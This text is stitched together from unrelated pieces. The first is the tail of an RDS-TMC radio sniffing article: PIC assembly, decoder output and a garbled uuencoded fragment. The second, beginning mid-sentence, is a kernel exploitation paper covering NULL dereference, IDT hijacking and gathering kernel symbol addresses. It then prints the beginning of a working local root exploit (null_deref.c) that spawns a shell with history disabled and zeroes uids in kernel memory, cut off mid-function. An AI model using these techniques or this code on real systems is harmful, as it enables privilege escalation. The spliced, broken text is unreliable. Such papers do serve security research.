RS232_data      equ     0x0C            ; char to transmit to RS232
BIT_counter     equ     0x0D            ; n. of bits to transmit to RS232
RAW_data        equ     0x0E            ; RAW data (from RDS demodulator)
dummy_counter   equ     0x0F            ; dummy counter... used for delays

; BEGIN PROGRAM CODE ------------------------------------------------------

        ORG     000h

InitPort

        Bank1                           ; select bank 1

        movlw   00000000b               ; RA0-RA4 output
        movwf   TRISA                   ;

        movlw   00000111b               ; RB0-RB2 input / RB3-RB7 output
        movwf   TRISB                   ;

        Bank0                           ; select bank 0

        movlw   00000010b               ; set voltage at -12V to RS232 ''RX''
        movwf   PORTA                   ;

Main

        btfsc   CLOCK                   ; wait for clock edge (high -> low)
        goto    Main                    ;

        movfw   PORTB                   ;
        andlw   00000011b               ; reads levels on PORTB and send
        movwf   RAW_data                ; data to RS232
        call    RS232_Tx                ;

        btfss   CLOCK                   ; wait for clock edge (low -> high)
        goto    $-1                     ;

        goto    Main

RS232_Tx                                ; RS232 (19200 baud rate) 8-N-2
                                        ; 1 start+8 data+2 stop - No parity
        btfsc   RAW_data,1
        goto    Good_qual
        goto    Bad_qual

Good_qual                               ;
        movlw   00000001b               ;
        andwf   RAW_data,w              ; good quality signal
        iorlw   '0'                     ; sends '0' or '1' to RS232
        movwf   RS232_data              ;
        goto    Char_Tx

Bad_qual                                ;
        movlw   00000001b               ;
        andwf   RAW_data,w              ; bad quality signal
        iorlw   '*'                     ; sends '*' or '+' to RS232
        movwf   RS232_data              ;

Char_Tx

        movlw   9                       ; (8 bits to transmit)
        movwf   BIT_counter             ; BIT_counter = n. bits + 1

        call    StartBit                ; sends start bit

Send_loop

        decfsz  BIT_counter, f          ; sends all data bits contained in
        goto    Send_data_bit           ; RS232_data

        call    StopBit                 ; sends 2 stop bit and returns to Main

        Send_1
        goto    Delay16

StartBit

        Send_0
        nop
        nop
        goto    Delay16

StopBit

        nop
        nop
        nop
        nop
        nop
        Send_1
        call    Delay8
        goto    Delay16

Send_0_

        Send_0
        goto    Delay16

Send_1_

        nop
        Send_1
        goto    Delay16

Send_data_bit

        rrf     RS232_data, f           ; result of rotation is saved in
        Skip_if_C                       ; C FLAG, so skip if FLAG is set
        goto    Send_zero

        call    Send_1_
        goto    Send_loop

Send_zero

        call    Send_0_
        goto    Send_loop

;
; 4 / clock = ''normal'' instruction period (1 machine cycle )
; 8 / clock = ''branch'' instruction period (2 machine cycles)
;
;       clock           normal instr.           branch instr.
;     2.4576 MHz          1.6276 us               3.2552 us
;

Delay16

        movlw   2                       ; dummy cycle,
        movwf   dummy_counter           ; used only to get correct delay
                                        ; for timing.
        decfsz  dummy_counter,f         ;
        goto    $-1                     ; Total delay: 8 machine cycles
        nop                             ; ( 1 + 1 + 1 + 2 + 2 + 1 = 8 )

Delay8

        movlw   2                       ; dummy cycle,
        movwf   dummy_counter           ; used only to get correct delay
                                        ; for timing.
        decfsz  dummy_counter,f         ;
        goto    $-1                     ; Total delay: 7 machine cycles
                                        ; ( 1 + 1 + 1 + 2 + 2 = 7 )

Delay1

        nop

        RETURN                          ; unique return point

        END

; END PROGRAM CODE --------------------------------------------------------


</code> 


Using the circuit we assembled we can "sniff" RDS traffic directly on the 
serial port using screen, minicom or whatever terminal app you like. 

You should configure your terminal before attaching it to the serial port, 
the settings are 19200 baud rate, 8 data bits, 2 stop bits, no parity. 


# stty -F /dev/ttyS0 19200 cs8 cstopb -parenb
speed 19200 baud; rows 0; columns 0; line = 0; intr = ^C; quit = ^\;
erase = ^?; kill = ^H; eof = ^D; eol = <undef>; eol2 = <undef>;
swtch = <undef>; start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R;
werase = ^W; lnext = ^V; flush = ^O; min = 100; time = 2; -parenb -parodd
cs8 -hupcl cstopb cread clocal crtscts -ignbrk brkint ignpar -parmrk -inpck
-istrip -inlcr -igncr -icrnl -ixon -ixoff -iuclc -ixany -imaxbel -iutf8
-opost -olcuc -ocrnl -onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0
vt0 ff0 -isig -icanon iexten cho echo chok chonl -noflsh -xcase
-tostop -echoprt echoctl echoke


# screen /dev/ttyS0 19200
1010100100001100000000101000%*000101001411101111011111111110000001011011100 
10101001++000001100101100%*110100101001000011000000111010000100101001111111 
0011101100010011000100000+000000000 ... <and so on> 


As you can see we get '0' and '1' as well as '*' and '+'; this is because
the circuit estimates the quality of the signal. '*' and '+' are bad
quality '0' and '1' data. We ignore bad data and only accept good quality;
if you see a relevant amount of '*' and '+' in your stream verify the tuner
settings.
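
A small sketch of how the four characters can be handled when
post-processing a dump: every character is turned into a (bit, quality)
pair and the share of bad bits is measured. Function names are ours and
anything that is not one of the four characters is simply skipped.

```python
GOOD = {"0": 0, "1": 1}   # good quality bits
BAD = {"*": 0, "+": 1}    # bad quality '0' and '1'


def classify(stream):
    """Yield (bit, is_good) for every recognised character of the stream."""
    for ch in stream:
        if ch in GOOD:
            yield GOOD[ch], True
        elif ch in BAD:
            yield BAD[ch], False


def bad_ratio(stream):
    """Fraction of received bits that were flagged as bad quality."""
    flags = [is_good for _bit, is_good in classify(stream)]
    if not flags:
        return 0.0
    return flags.count(False) / len(flags)


sample = "0101*+01\n"
print(list(classify(sample)))
print(f"bad bits: {bad_ratio(sample):.0%}")
```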


In order to identify the beginning of an RDS message and find the right
offset we "lock" against the PI code, which is present at the beginning of
every RDS group. PI codes for every FM radio station are publicly available
on the Internet, if you know the frequency you are listening to then you
can figure out the PI code and look for it. If you have no clue about what
the PI code might be, a way of finding it out is seeking the most recurring
16 bit string, which is likely to be the PI code.
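
The "most recurring 16 bit string" idea can be sketched as follows. This
is an illustration and not the decoder's actual code: the function name is
ours and the input is assumed to contain only '0' and '1' characters (bad
quality data already dealt with).

```python
from collections import Counter


def pi_candidates(bits, top=10):
    """Rank every 16 bit window of the stream by how often it occurs."""
    windows = (bits[i:i + 16] for i in range(len(bits) - 15))
    counts = Counter(windows)
    return [(w, n, f"{int(w, 2):04x}") for w, n in counts.most_common(top)]


# Synthetic stream: the same PI code three times, with filler in between.
pi = "0101001000011000"
stream = pi + "1" * 10 + pi + "0" * 10 + pi

for window, count, hexa in pi_candidates(stream, top=3):
    print(f"{window}: {count} ({hexa})")
```

On a real dump the PI code repeats every 104 bits, so it quickly stands
out from the rest of the windows.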




Here's a single raw RDS Group with PI 5401 (hexadecimal conversion of
0101010000000001):


0101010000000001111101100100000100001010001100101100
0000001000010100000011001001010010010000010001101110


Let's separate the different sections:


Block 1:  0101010000000001                   1111011001
          PI code                            Checkword

Block 2:  0000   0   1   00001  01000        1100101100
          Group  B0  TP  PTY    <5 bits>     Checkword

Block 3:  0000001000010100                   0000110010
          Data                               Checkword

Block 4:  0101001001000001                   0001101110
          Data                               Checkword

So we can isolate and identify RDS messages, now you can either parse them 
visually by reading the specs (not a very scalable way we might say) or use 
a tool like our Simple RDS Decoder. 


--[ 10. Simple RDS Decoder 0.1 


The tool parses basic RDS messages and 0A Groups (more Group decoding will
be implemented in future versions) and performs full decoding of Single
Group RDS-TMC messages (Multi Group support is also planned for future
releases).


Here’s the basic usage: 


# ./srdsd -h 


Simple RDS-TMC Decoder 0.1 || http://dev.inversepath.com/rds 
Copyright 2007 Andrea Barisani || <andrea@inversepath.com> 
Usage: ./srdsd.pl [-h|-H|-P|-t] [-d <location db path>] [-p <PI number>] <input file> 
-t display only tmc packets 
-H HTML output (outputs to /tmp/rds-*.html)
-p PI number
-P PI search
-d location db path 
-h this help 


Note: -d option expects a DAT Location Table code according to TMCF-LT-EF-MFF-v06 
standard (2005/05/11) 


As we mentioned the first step is finding the PI for your RDS stream, if you 
don’t know it already you can use ’-P’ option: 


# ./srdsd -P rds_dump.raw | tail 
0010000110000000: 4140 (2180) 
1000011000000001: 4146 (8601) 
0001100000000101: 4158 (1805) 
1001000011000000: 4160 (90c0) 
0000110000000010: 4163 (0c02) 
0110000000010100: 4163 (6014) 
0011000000001010: 4164 (300a) 
0100100001100000: 4167 (4860) 
1010010000110000: 4172 (a430) 
0101001000011000: 4185 (5218) 


Here 5218 looks like a reasonable candidate being the most recurrent 
string. Let’s try it: 


# ./srdsd -p 5218 -d ~/loc_db/ rds_dump.raw 


Reading TMC Location Table at ~/loc_db/: 
parsing NAMES: 13135 entries 
parsing ROADS: 1011 entries 
parsing SEGMENTS: 15 entries 
parsing POINTS: 12501 entries 


done. 


Got RDS message (frame 1) 
Programme Identification: 0101001000011000 (5218) 


Group type code/version: 0000/0 (0A - Tuning)
Traffic Program: 1
Programme Type: 01001 (9 Varied Speech)


Block 2: 01110
Block 3: 1111100000010110
Block 4: 0011000000110010
Decoded 0A group:
Traffic Announcement: 0
Music Speech switch: 0
Decoder Identification control: 110 (Artificial Head / PS char 5,6)
Alternative Frequencies: 11111000, 00010110 (112.3, 89.7)
Programme Service name: 0011000000110010 (02)
Collected PSN: 02


Got RDS message (frame 76)
Programme Identification: 0101001000011000 (5218)


Group type code/version: 1000/0 (8A - TMC)
Traffic Program: 1
Programme Type: 01001 (9 Varied Speech)


Block 2: 01000
Block 3: 0101100001110011
Block 4: 0000110000001100
Decoded 8A group:
Bit X4: 0 (User message)
Bit X3: 1 (Single-group message)
Duration and Persistence: 000 (no explicit duration given)
Diversion advice: 0
Direction: 1 (-)
Extent: 011 (3)
Event: 00001110011 (115 - slow traffic (with average speeds Q))
Location: 0000110000001100 (3084)
Decoded Location:
Location code type: POINT
Name ID: 11013 (Sv. Grande Raccordo Anulare)
Road code: 266 (Roma-Ss16)
GPS: 41.98449 N 12.49321 E
Link: http://maps.google.com/maps?ll=41.98449,12.49321&spn=0.3,0.3&q=41.98449,12.49321


...and so on. 


The 'Collected PSN' variable holds all the characters of the Programme
Service name seen so far, this way we can track (just like RDS FM Radios
do) the name of the station:


# ./srdsd -p 5201 rds_dump.raw | grep "Collected PSN" | head


Collected PSN: DI
Collected PSN: DIO1
Collected PSN: DIO1
Collected PSN: RADIO1
Collected PSN: RADIO1


Check out the '-H' switch for html'ized output in /tmp (which can be useful
for directly following the Google Map links). We also have a version that
plots all the traffic on Google Map using their API, if you are interested
in it just email us.


Have fun. 


--[ I. References 


[1] - Italian RDS-TMC Location Table Database
      https://www2.ilportaledellautomobilista.it/info/infofree?idUser=1&idBody=14

[2] - Philips FM1216 DataSheet
      http://pvr.sourceforge.net/FM1216.pdf

[3] - PVR Hardware Database
      http://pvrhw.goldfish.org

[4] - SGS-Thomson Microelectronics TDA7330
      http://www.datasheetcatalog.com/datasheets_pdf/T/D/A/7/TDA7330.shtml

[5] - Philips SAA6579
      http://www.datasheetcatalog.com/datasheets_pdf/S/A/A/6/SAA6579.shtml

[6] - uJDM PIC Programmer
      http://www.semis.demon.co.uk/uJDM/uJDMmain.htm

[7] - Maxim RS-232
      http://www.maxim-ic.com/getds.cfm?qv_pk=1798&ln=en

[8] - Xcircuit
      http://xcircuit.ece.jhu.edu


--[ II. Code 


Code also available at http://dev.inversepath.com/rds/ 


<++> Simple RDS Decoder 0.1 - srdsd.u 


begin 644 srdsd 
M(RSO=7-R+V) 1; B] P97) 


L"B, * (R!3:6UP; &4@ 


M, OHC"B, @5&AI<R! #; V1 
M86YD (%5G;’D 
M(S-O<’ ER: 6=H=""R, #\W(S 

Here's the schematic of the RDS Demodulator. You can directly use it to
view / print the circuit or import the file with Xcircuit[9] to
modify the diagram.


exploitation. The growing diffusion of "security prevention" approaches
(no-exec stack, no-exec heap, ascii-armored library mmapping, mmap/stack
and generally virtual layout randomization, just to point out the most
known) has made, and is making, userland exploitation harder and harder.

Moreover, there has been extensive auditing work on application code,
so that new bugs are generally more complex to handle and exploit.


Attention has therefore turned towards the core of the operating systems,
towards kernel (in)security. This paper will attempt to give an insight
into kernel exploitation, with examples for IA-32, UltraSPARC and AMD64.
Linux and Solaris will be the target operating systems. More precisely,
each architecture in turn will be the main one covered for one of the three
main exploiting demonstration categories : slab (IA-32), stack (UltraSPARC)
and race condition (AMD64). The details explained in those 'deep focus'
sections apply, though, almost in toto to all the other exploiting
scenarios.


Since exploitation examples are surely interesting but usually do not show
the "effective" complexity of taking advantage of vulnerabilities, a
couple of working real-life exploits will be presented too.


------[ 1 - The playground


Let's just point out, before starting, that "bruteforcing" and "kernel"
aren't two words that go well together. One can't just crash the kernel
over and over trying to guess the right return address or the good
alignment. An error in kernel exploitation usually leads to a crash,
panic or unstable state of the operating system.

The "information gathering" step is therefore definitely important, just
like a good knowledge of the operating system layout.


---[ 1.1 - Kernel/Userland virtual address space layouts 


From the userland point of view, we see almost nothing of the kernel
layout nor of the addresses at which it is mapped [there are indeed a
couple of pieces of information that we can gather from userland, and
we're going to point them out later].

Nevertheless it is from userland that we have to start to carry out our
attack, and so a good knowledge of the kernel virtual memory layout
(and implementation) is, indeed, a must.


There are two possible address space layouts :


- kernel space on behalf of user space (kernel page tables are
  replicated over every process; the virtual address space is split in
  two parts, one for the kernel and one for the processes).
  Kernels running on x86, AMD64 and sun4m/sun4d architectures usually have
  this kind of implementation.


- separated kernel and process address space (both can use the whole
  address space). Such an implementation, to be efficient, requires
  dedicated support from the underlying architecture. It is the case of
  the primary and secondary context register used in conjunction with the
  ASI identifiers on the UltraSPARC (sun4u/sun4v) architecture.


To see the main advantage (from an exploiting perspective) of the first
approach over the second one we need to introduce the concept of
"process context".
Any time the CPU is in "Supervisor" mode (the well-known ring0 on ia-32),
the kernel path it is executing is said to be in interrupt context if it
doesn't have a backing process.
Code in interrupt context can't block (for example waiting for demand
paging to bring in a referenced userspace page): the scheduler is
unable to know what to put to sleep (and what to wake up after).


Code running in process context has instead an associated process
(usually the one that "generated" the kernel code path, for example
issuing a systemcall) and is free to block/sleep (and so, it's free to
reference the userland virtual address space).


This is good news on systems which implement a combined user/kernel
address space, since, while executing at kernel level, we can
dereference (or jump to) userland addresses.

The advantages are obvious (and many) :


- we don't have to "guess" where our shellcode will be and we can
  write it in C (which makes it easier to write, if needed, long and
  somewhat complex recovery code)


- we don't have to face the problem of finding a suitably large and
  safe place to store it.


- we don't have to worry about no-exec page protection (we're free to
  mmap/mremap as we wish, and, obviously, load the code directly in the
  .text segment, if we don't need to patch it at runtime).


- we can mmap large portions of the address space and fill them with
  nops or nop-alike code/data (useful when we don't completely
  control the return address or the dereference)


- we can easily take advantage of the so-called "NULL pointer
  dereference bugs" ("technically" described later on)

The space left to the kernel is therefore limited in size : on the x86
architecture it is 1 Gigabyte on Linux and it fluctuates on Solaris
depending on the amount of physical memory (check
usr/src/uts/i86pc/os/startup.c inside the OpenSolaris sources).

This fluctuation turned out to be necessary to avoid, as much as possible,
wasting virtual memory ranges and, at the same time, to avoid pressure on
the space reserved to the kernel.


The only limitation to kernel (and processes) virtual space on systems
implementing a separated userland/kerneland address space is given by the
architecture (UltraSPARC I and II can reference only 44 bits of the whole
64-bit addressable space. This VA-hole is placed between
0x0000080000000000 and 0xFFFFF7FFFFFFFFFF).
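
The two boundaries follow directly from the 44 bit limit: an address is
usable only if bits 63..43 are all equal. A quick sketch to check it (the
function names are ours, addresses are treated as unsigned 64-bit
integers):

```python
VA_HOLE_START = 0x0000080000000000
VA_HOLE_END = 0xFFFFF7FFFFFFFFFF


def in_va_hole(addr):
    """True if the address falls inside the unusable range."""
    return VA_HOLE_START <= addr <= VA_HOLE_END


def is_sign_extended_44bit(addr):
    """True when bits 63..43 are all zeros or all ones."""
    top = addr >> 43                  # the upper 21 bits
    return top == 0 or top == (1 << 21) - 1


for addr in (0x000007FFFFFFFFFF, VA_HOLE_START, VA_HOLE_END, 0xFFFFF80000000000):
    print(f"{addr:#018x} hole={in_va_hole(addr)} valid={is_sign_extended_44bit(addr)}")
```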


This memory model indeed makes exploitation harder, because we can't
directly dereference the userspace. The previously cited NULL pointer
dereferences are pretty much un-exploitable.
Moreover, we can't rely on "valid" userland addresses as a place to store
our shellcode (or any other kernel emulation data), nor can we "return
to userspace".


We won't go into more detail here with a theoretical description of the
architectures (you can check the reference manuals at [1], [2] and [3])
since we've preferred to couple the analysis of the architectural and
operating systems internal aspects relevant to exploitation with the
presentation of the actual exploit code.


---[ 1.2 - Dummy device driver and real vulnerabilities 


As we said in the introduction, we're going to present a couple of real
working exploits, hoping to give a better insight into the whole kernel
exploitation process.

We've written exploits for :


- MCAST_MSFILTER vulnerability [4], used to demonstrate kernel slab
  overflow exploiting


- sendmsg vulnerability [5], used to demonstrate an effective race
  condition (and a stack overflow on AMD64)


- madwifi SIOCGIWSCAN buffer overflow [21], used to demonstrate a real
  remote exploit for the linux kernel. That exploit was already released
  at [22] before the release of this paper (which has a more detailed
  discussion of it and another 'dummy based' exploit for a more complex
  scenario)


Moreover, we've written a dummy device driver (for Linux and Solaris) to
demonstrate with examples the techniques presented.

A more complex remote exploit (as previously mentioned) and an exploit
capable of circumventing Linux with PaX/KERNEXEC (and userspace/kernelspace
separation) will be presented too.


---[ 1.3 - Notes about information gathering 


Remember when we were talking about information gathering ? Nearly every
operating system 'exports' to userland information useful for developing
and debugging. Both Linux and Solaris (we're not taking into account
'security patches' now) expose, readable by the user, the list and
addresses of their exported symbols (symbols that module writers can
reference) : /proc/ksyms on Linux 2.4, /proc/kallsyms on Linux 2.6 and
/dev/ksyms on Solaris (the first two are text files, the last one is an ELF
with SYMTAB section).
Those files provide useful information about what is compiled into the
kernel and at what addresses some functions and structs are located,
addresses that we can gather at runtime and use to increase the reliability
of our exploit.
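
As an illustration of how simple those text files are to consume, here is
a sketch of a parser for /proc/kallsyms-style lines ("address type name",
optionally followed by a module name). The function name and the sample
addresses are made up for the example.

```python
def parse_kallsyms(text):
    """Map symbol name -> (address, type) from kallsyms-style text."""
    symbols = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 3:
            continue                          # skip blank or malformed lines
        address, sym_type, name = fields[0], fields[1], fields[2]
        # keep the first occurrence if a name shows up more than once
        symbols.setdefault(name, (int(address, 16), sym_type))
    return symbols


# Hypothetical sample; on a live system the text would be read from
# /proc/kallsyms, if the file is present and readable.
sample = (
    "c0100000 T _stext\n"
    "c011a2b0 T sys_getpid\n"
    "f8a3c000 t helper\t[dummy]\n"
)
for name, (address, sym_type) in parse_kallsyms(sample).items():
    print(f"{name:12s} {sym_type} {address:#010x}")
```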


But this information could be missing in some environments: the /proc
filesystem could be un-mounted or the kernel compiled (along with some
security switch/patch) to not export it.

This is more a Linux problem than a Solaris one, nowadays. Solaris exports
way more information than Linux (probably to aid in debugging without
having the sources) to the userland. Every module is shown with its
loading address by 'modinfo', the proc interface exports the address of
the kernel 'proc_t' struct to the userland (giving a crucial entrypoint,
as we will see, for the exploitation on UltraSPARC systems) and the 'kstat'
utility lets us investigate many kernel parameters.


In absence of /proc (and /sys, on Linux 2.6) there's another place we can
gather information from, the kernel image on the filesystem.
There are actually two possible favourable situations :


- the image is somewhere on the filesystem and it's readable, which is
  the default for many Linux distributions and for Solaris


- the target host is running a default kernel image, either from
  installation or taken from a repository. In that situation it is just a
  matter of recreating the same image on our system and inferring from it.
  This should always be possible on Solaris, given the patchlevel (taken
  from 'uname' and/or 'showrev -p').
  Things could change if OpenSolaris takes place, we'll see.


The presence of the image (or the possibility of knowing it) is crucial
for the KERN_EXEC/separated userspace/kernelspace environment exploitation
presented at the end of the paper.


Given we don't have exported information and the careful administrator has
removed running kernel images (and, logically, in absence of kernel memory
leaks ;)) we've one last resource that can help in exploitation: the
architecture.

Let's take the x86 arch: a process running at ring3 may query the logical
address and offset/attribute of processor tables GDT, LDT, IDT, TSS:

  - through 'sgdt' we get the base address and max offset of the GDT
  - through 'sldt' we can get the GDT entry index of the current LDT
  - through 'sidt' we can get the base address and max offset of the IDT
  - through 'str' we can get the GDT entry index of the current TSS

The best choice (not the only one possible) in that case is the IDT. The
possibility to change just a single byte in a controlled place of it
leads to a fully working reliable exploit [*].


[*] The idea here is to modify the MSB of the base_address of an IDT entry
    and so "hijack" the exception handler. Logically we need a controlled
    byte overwrite or a partially controlled one with a byte value below
    the 'kernelbase' value, so that we can make it point into the userland
    portion. We won't go into deeper details about the IDT
    layout/implementation here, you can find them inside processor manuals
    [1] and kad's phrack59 article "Handling the Interrupt Descriptor
    Table" [6].
    The NULL pointer dereference exploit presented for Linux implements
    this technique.


As important as the information gathering step is the recovery step, which 
aims to leave the kernel in a consistent state. This step is usually 
performed inside the shellcode itself or just after the exploit has 
(successfully) taken place, by using /dev/kmem or a loadable module (if 
possible). 

This step is logically exploit-dependent, so we will just explain it along
with the examples (making a categorization would be pointless).


---[ 2 - Kernel vulnerabilities and bugs


We start now with an excursus over the various types of kernel
vulnerabilities. The kernel is a big and complex beast, so even if we're
going to track down some "common" scenarios, there are many more
possible "logical bugs" that can lead to a system compromise.


We will cover stack based, "heap" (better, slab) based and NULL/userspace
dereference vulnerabilities. As an example of a "logical bug" a whole
chapter is dedicated to race conditions and techniques to force a kernel
path to sleep/reschedule (along with a real exploit for the sendmsg [4]
vulnerability on AMD64).


We won’t cover in this paper the range of vulnerabilities related to 
virtual memory logical errors, since those have been already extensively 
described and cleverly exploited, on Linux, by iSEC [7] people. 

Moreover, it's nearly useless, in our opinion, to create "crafted"
demonstrative vulnerable code for logical bugs and we weren't aware of any
_public_ vuln of this kind on Solaris. If you are, feel free to submit it,
we'll be happy to work on it ;).


---[ 2.1 - NULL/userspace dereference vulnerabilities 


This kind of vulnerability derives from the use of an uninitialized
pointer (generally having a NULL value) or a trashed one, so that it
points inside the userspace part of the virtual memory address space.
The normal behaviour of an operating system in such a situation is an oops
or a crash (depending on the degree of severity of the dereference) while
attempting to access unmapped memory.


But we can, obviously, mmap that memory range and let the kernel find
"valid" malicious data. That's more than enough to gain root privileges.
We can delineate two possible scenarios:


  - instruction pointer modification (direct call/jmp dereference,
    called function pointers inside a struct, etc)

  - "controlled" write on kernelspace


The first kind of vulnerability is really trivial to exploit, it's just a
matter of mmapping the referenced page and putting our shellcode there.
If the dereferenced address is a struct with a function pointer inside (or
a chain of structs with a function pointer somewhere), it is just a matter
of emulating those structs in userspace, making the function pointer point
to our shellcode and letting/forcing the kernel path to call it.


We won't show an example of this kind of vulnerability since this is the
"last stage" of any more complex exploit (as we will see, we'll always be
trying, when possible, to jump to userspace).


The second kind of vulnerability is a little more complex, since we can’t 
directly modify the instruction pointer, but we’ve the possibility to 
write anywhere in kernel memory (with controlled or uncontrolled data). 


Let's take a look at this snippet of code, taken from our Linux dummy
device driver:


< stuff/drivers/linux/dummy.h >

[...]

struct user_data_ioctl
{
  int size;
  char *buffer;
};

< / >

< stuff/drivers/linux/dummy.c >

static int alloc_info(unsigned long sub_cmd)
{
  struct user_data_ioctl user_info;
  struct info_user *info;
  struct user_perm *perm;

  [...]

  if(copy_from_user(&user_info,
                    (void __user*)sub_cmd,
                    sizeof(struct user_data_ioctl)))
    return -EFAULT;

  if(user_info.size > MAX_STORE_SIZE)                  [1]
    return -ENOENT;

  info = kmalloc(sizeof(struct info_user), GFP_KERNEL);
  if(!info)
    return -ENOMEM;

  perm = kmalloc(sizeof(struct user_perm), GFP_KERNEL);
  if(!perm)
    return -ENOMEM;

  info->timestamp = 0;//sched_clock();
  info->max_size  = user_info.size;
  info->data = kmalloc(user_info.size, GFP_KERNEL);    [2]
  /* unchecked alloc */
  perm->uid = current->uid;
  info->data->perm = perm;                             [3]

  glob_info = info;

[...]

static int store_info(unsigned long sub_cmd)
{
  [...]
  glob_info->data->perm->uid = current->uid;           [4]
  [...]

< / >


Due to the integer signedness issue at [1], we can pass a huge value
to the kmalloc at [2], making it fail (and so return NULL).
The lack of checking at that point leaves a NULL value in the info->data
pointer, which is later used, at [3] and also inside store_info at [4], to
save the current uid value.
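
To make the signedness issue at [1] concrete, here is a small userspace
sketch of the two views of the same 'size' field. The MAX_STORE_SIZE value
and both helper names are assumptions of ours (the driver's real limit is
not shown in the snippet above); only the signed compare and the later
unsigned conversion mirror the driver code.

```c
#include <assert.h>
#include <stddef.h>

/* Assumed limit: the real MAX_STORE_SIZE value is not shown in the paper. */
#define MAX_STORE_SIZE 4096

/*
 * Mirrors the check at [1]: 'size' is a signed int, so any negative value
 * compares as "not greater" than the limit and passes.
 */
int passes_size_check(int size)
{
    return !(size > MAX_STORE_SIZE);
}

/*
 * Mirrors what the allocator receives at [2]: the signed value is
 * converted to an unsigned size_t, so a negative size becomes a huge
 * request that the allocator cannot satisfy.
 */
size_t size_seen_by_allocator(int size)
{
    /* the conversion below must not truncate for the point to hold */
    assert(sizeof(size_t) >= sizeof(int));
    return (size_t)size;
}
```

Passing -1 is enough: the check lets it through, while the allocation is
asked for the largest representable size and fails.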


What we have to do to exploit such code is simply mmap the zero page
(0x00000000 - NULL) at userspace, make the kmalloc fail by passing a
negative value and then prepare a 'fake' data struct in the previously
mmapped area, providing a working pointer for 'perm' and thus being able
to write our 'uid' anywhere in memory.


At that point we have many ways to exploit the vulnerable code (exploiting 
while being able to write anywhere some arbitrary or, in that case, 
partially controlled data is indeed limited only by imagination), but it’s 
better to find a "working everywhere" way. 


As we said above, we’re going to use the IDT and overwrite one of its 
entries (more precisely a Trap Gate, so that we’re able to hijack an 
exception handler and redirect the code-flow towards userspace). 

Each IDT entry is 64-bit (8-bytes) long and we want to overflow the
'base_offset' value of it, to be able to modify the MSB of the exception
handler routine address and thus redirect it below the PAGE_OFFSET
(0xc0000000) value.


Since the higher 16 bits are in the 7th and 8th byte of the IDT entry,
that one is our target, but we are writing at [4] 4 bytes for the 'uid'
value, so we're going to trash the next entry. It is better to use two
adjacent 'seldom used' entries (in case, for some strange reason,
something went bad) and we have decided to use the 4th and 5th entries:
#OF (Overflow Exception) and #BR (BOUND Range Exceeded Exception).
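
The effect of that 4-byte store can be checked on a userspace copy of a
few gates. The sketch below assumes the standard 32-bit gate layout from
the processor manuals (offset 15..0 in bytes 0-1, selector in bytes 2-3,
type/attributes in byte 5, offset 31..16 in bytes 6-7); the helper names,
the sample handler addresses and the uid are made up for illustration.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define GATE_SIZE 8   /* one 32-bit IDT gate descriptor */

/* Handler address = offset[31:16] (bytes 6-7) | offset[15:0] (bytes 0-1). */
uint32_t gate_handler(const uint8_t *gate)
{
    return (uint32_t)gate[0] | ((uint32_t)gate[1] << 8) |
           ((uint32_t)gate[6] << 16) | ((uint32_t)gate[7] << 24);
}

/* Build a gate: selector in bytes 2-3, type/attribute byte in byte 5. */
void gate_build(uint8_t *gate, uint32_t handler, uint16_t selector,
                uint8_t type_attr)
{
    gate[0] = handler & 0xff;
    gate[1] = (handler >> 8) & 0xff;
    gate[2] = selector & 0xff;
    gate[3] = (selector >> 8) & 0xff;
    gate[4] = 0;
    gate[5] = type_attr;
    gate[6] = (handler >> 16) & 0xff;
    gate[7] = (handler >> 24) & 0xff;
}

/*
 * Emulate the 4-byte little-endian store of 'uid' at offset 6 of entry
 * 'vector' in a copy of the table holding 'nentries' gates. Two bytes
 * land in the target gate, the other two in the following one.
 */
void store_uid_at_gate(uint8_t *idt, unsigned nentries, unsigned vector,
                       uint32_t uid)
{
    uint8_t le[4];

    assert(vector + 1 < nentries);   /* the store spills into the next gate */
    le[0] = uid & 0xff;
    le[1] = (uid >> 8) & 0xff;
    le[2] = (uid >> 16) & 0xff;
    le[3] = (uid >> 24) & 0xff;
    memcpy(idt + vector * GATE_SIZE + 6, le, sizeof(le));
}
```

With a uid of 1000 (0x3e8) a handler at 0xc0103b10 becomes 0x03e83b10,
which is below PAGE_OFFSET, while the next gate only loses the low 16 bits
of its handler address.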


At that point we don't completely control the return address, but that's
not a big problem, since we can mmap a large region of the userspace and
fill it with NOPs, to prepare a comfortable and safe landing point for our
exploit. The last thing we have to do is to restore, once we get the
control flow at userspace, the original IDT entries, hardcoding the values
inside the shellcode stub or using an lkm or /dev/kmem patching code.


At that point our exploit is ready to be launched for our first 
‘rootshell’. 


As a last (indeed obvious) note, NULL dereference vulnerabilities are 
only exploitable on ’combined userspace and kernelspace’ memory model 
operating systems. 


---[ 2.1.1 - NULL/userspace dereference vulnerabilities : null_deref.c 


< stuff/expl/null_deref.c >

#include <sys/ioctl.h>
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>

#include "dummy.h"

#define DEVICE "/dev/dummy"
#define NOP 0x90
#define STACK_SIZE 8192

//#define STACK_SIZE 4096

#define PAGE_SIZE 0x1000
#define PAGE_OFFSET 12
#define PAGE_MASK ~(PAGE_SIZE -1)

#define ANTANI "antani"

uint32_t bound_check[2]={0x00,0x00};
extern void do_it();
uid_t UID;

void do_bound_check()
{
  asm volatile("bound %1, %0\t\n" : "=m"(bound_check) : "a"(0xFF));
}

/* simple shell spawn */
void get_root()
{
  char *argv[] = { "/bin/sh", "--noprofile", "--norc", NULL };
  char *envp[] = { "TERM=linux", "PS1=y0y0\\$", "BASH_HISTORY=/dev/null",
                   "HISTORY=/dev/null", "history=/dev/null",
                   "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin",
                   NULL };

  execve("/bin/sh", argv, envp);
  fprintf(stderr, "[**] Execve failed\n");
  exit(-1);
}

/* this function is called by fake exception handler: take 0 uid and
   restore trashed entry */
void give_priv_and_restore(unsigned int thread)
{
  int i;
  unsigned short addr;
  unsigned int* p = (unsigned int*)thread;

  /* simple trick */
  for(i=0; i < 0x100; i++)
    if( (p[i] == UID) && (p[i+1] == UID) && (p[i+2] == UID) && (p[i+3] == UID) )
      p[i] = 0, p[i+1] = 0;
}


#define CODE_SIZE 0x1e

void dummy(void)
{
asm("do_it:;"
    "addl $6, (%%esp);"  // after bound exception EIP points again to the bound instruction
    "pusha;"
    "movl %%esp, %%eax;"
    "andl %0, %%eax;"
